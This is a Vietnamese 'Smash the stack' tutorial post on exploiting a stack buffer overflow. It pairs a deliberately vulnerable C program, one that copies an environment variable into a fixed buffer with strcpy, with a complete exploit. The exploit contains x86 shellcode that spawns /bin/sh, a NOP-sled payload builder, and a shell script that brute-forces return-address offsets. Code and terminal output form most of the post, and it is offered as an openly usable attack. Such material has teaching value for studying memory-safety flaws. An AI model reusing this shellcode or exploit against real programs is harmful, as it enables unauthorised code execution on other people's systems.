

1/4/10

[Hacking] "Smash the stack" - Hướng dẫn khai thác buffer overflow

Chúng ta có một chương trình bị lỗi tràn bộ đệm:

/* Vuln.c: a deliberately vulnerable program that demonstrates a stack
 * buffer overflow (unbounded strcpy of an environment variable).
 */
#include
#include
#include

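/*
 * Demonstration target: copies the EGG environment variable into a
 * fixed 512-byte stack buffer with strcpy(), so any value longer than
 * 511 bytes overwrites what follows the buffer on the stack (the
 * transcripts below show the resulting segmentation fault).
 *
 * Returns 0 after printing the value; exits with status 0 when EGG is
 * not set.
 *
 * Fix relative to the original listing: the copy referenced an
 * undeclared `buf2`, which does not compile; the intended source is
 * the pointer returned by getenv(), here `buff`.
 */
int main(void)
{
    char buffer[512];
    char *buff = getenv("EGG");

    if (buff == NULL) {
        printf("No environment found!\n");
        printf("Aborting!\n");
        exit(0);
    }

    /* INTENTIONALLY UNSAFE: no length check on an attacker-controlled
     * string. A hardened version would use a bounded copy and check for
     * truncation, e.g. snprintf(buffer, sizeof buffer, "%s", buff). */
    strcpy(buffer, buff);
    printf("Using environemtn: %s\n", buff);
    return 0;
}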
bt buffer_overflow # ./vuln

No environment found!
Aborting!
bt buffer_overflow # export EGG="1234567890"


bt buffer_overflow # ./vuln

Using enviromental string: 1234567890
bt buffer_overflow # export EGG=`perl -e 'print "A"x628'`



bt buffer_overflow # ./vuln

Using enviromental string: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
bt buffer_overflow # ulimit -c unlimited
bt buffer_overflow # ./vuln

Using enviromental string: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)


[################################][EBP][EIP][######]

Sau khi làm tràn:


[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA][AAAA][AAAA][AAAAAAA]



Mục tiêu của chúng ta (cách bố trí này chỉ hoạt động khi stack thực thi được và địa chỉ stack đoán được, tức hệ thống không có NX/ASLR hay stack protector):

[NNNNNNNSSSSSSSSSSSSSSRRRRRRRRRRR][R][R][RRRRRRR]



N: Nop
S: shellcode
R: return address.

#include 
#include
#define OFFSET 0          /* default value subtracted from esp(); overridden by argv[2] */
#define BUFFER_SIZE 628   /* default payload length; overridden by argv[1]; same 628 bytes as the "A"x628 crash above */
#define NOP 0x90          /* x86 one-byte NOP used as filler ("N" in the layout sketch) */
/*
 * Returns the stack pointer as seen inside this function: the inline
 * asm copies %esp into %eax (the 32-bit x86 return register) and the
 * function then falls off its closing brace without a `return`.
 * NOTE(review): using the value of a non-void function that ends
 * without a return statement is undefined behaviour in C; this only
 * works if the compiler leaves %eax untouched between the asm and the
 * epilogue (32-bit, unoptimised build assumed — confirm). The value is
 * esp()'s own frame, not the caller's.
 */
unsigned long esp(void)
{
__asm__("movl %esp,%eax");
}
/* Payload bytes copied into the middle of the buffer ("S" in the layout
 * sketch). Only the trailing "/bin/sh" is readable as text; the leading
 * bytes are raw x86 machine code and are not decoded in this tutorial.
 * strlen() is used on it below, so the array must contain no 0x00 byte
 * before its terminator. */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
;


/*
 * Driver for ./vuln: builds one environment string "EGG=<payload>" and
 * launches the target with it.
 *
 * argv[1] (optional): payload length in bytes, default BUFFER_SIZE.
 * argv[2] (optional): value subtracted from esp() to form the guessed
 *                     return address, default OFFSET.
 *
 * Payload layout (the N/S/R sketch above): the whole buffer is first
 * filled with the guessed address, the first half is then overwritten
 * with NOPs, and the shellcode is placed so that it straddles the
 * middle of the buffer.
 *
 * NOTE(review): declared `void` yet ends with `return 0;`, which is a
 * constraint violation most compilers only warn about; the standard
 * signature is `int main(int argc, char *argv[])`. atoi() yields 0 on
 * non-numeric input and neither value is range-checked, so size_buf == 0
 * makes `buffer[size_buf - 1]` write before the allocation. The address
 * fill advances a `long *` while stepping `i` by 4, which is only
 * consistent where sizeof(long) == 4 (32-bit build assumed — confirm;
 * on LP64 the loop writes past the end of buffer). The technique as a
 * whole presumes a predictable, executable stack — no ASLR, NX or stack
 * protector — which is why it is shown here as a historical demonstration.
 */
void main(int argc,char * argv[])
{
char *buffer;          /* heap copy of "EGG=" + payload, handed to putenv() */
char *buffer_ptr;      /* cursor used for the shellcode copy */
long *addr_ret_ptr;    /* long-sized view of buffer for the address fill */
long addr;             /* guessed return address repeated through the buffer */
int size_buf = BUFFER_SIZE;
int offset = OFFSET;
if(argc > 1) { size_buf = atoi(argv[1]); }
if(argc > 2) { offset = atoi(argv[2]); }
if(!(buffer = malloc(size_buf)))
{
printf("Unable to allocate memory.\n");
exit(0);
}

/* Guess where the target's stack will be: our own stack pointer minus
 * the caller-chosen offset (the shell loop below sweeps this value). */
addr = esp() - offset;
buffer_ptr = buffer;
addr_ret_ptr = (long *) buffer_ptr;
int i ;
/* Step 1: repeat the guessed address across the whole buffer. */
for(i = 0; i < size_buf; i+=4) { *(addr_ret_ptr++) = addr; }
/* Step 2: turn the first half into a NOP sled. */
for(i = 0; i < size_buf / 2; i++) { buffer[i] = NOP; }
/* Step 3: copy the shellcode so it is centred on size_buf/2. */
buffer_ptr = buffer + ((size_buf/2) - (strlen(shellcode)/2));
for(i = 0; i < strlen(shellcode); i++) { *(buffer_ptr++) =shellcode[i]; }
buffer[size_buf - 1] = '\0';   /* terminate so putenv() sees a C string */
memcpy(buffer, "EGG=", 4);     /* variable name overwrites the first 4 bytes of the address fill */
putenv(buffer);                /* presumably putenv keeps the pointer (POSIX), so buffer is never freed */
system("./vuln");              /* run the target; it inherits EGG from this process */
return 0;
}













#!/bin/sh
# Sweep driver: run ./expl with a 628-byte payload and every offset
# from 1 to 9999. Each run launches ./vuln with the crafted EGG
# variable (see expl above); the loop does not stop on its own once a
# run succeeds, so interrupt it by hand.
OFFSET=1
until [ "$OFFSET" -ge 10000 ]
do
    ./expl 628 "$OFFSET"
    OFFSET=$((OFFSET + 1))
done
tut by Suto@vnsecurity.net leecher : fckD3r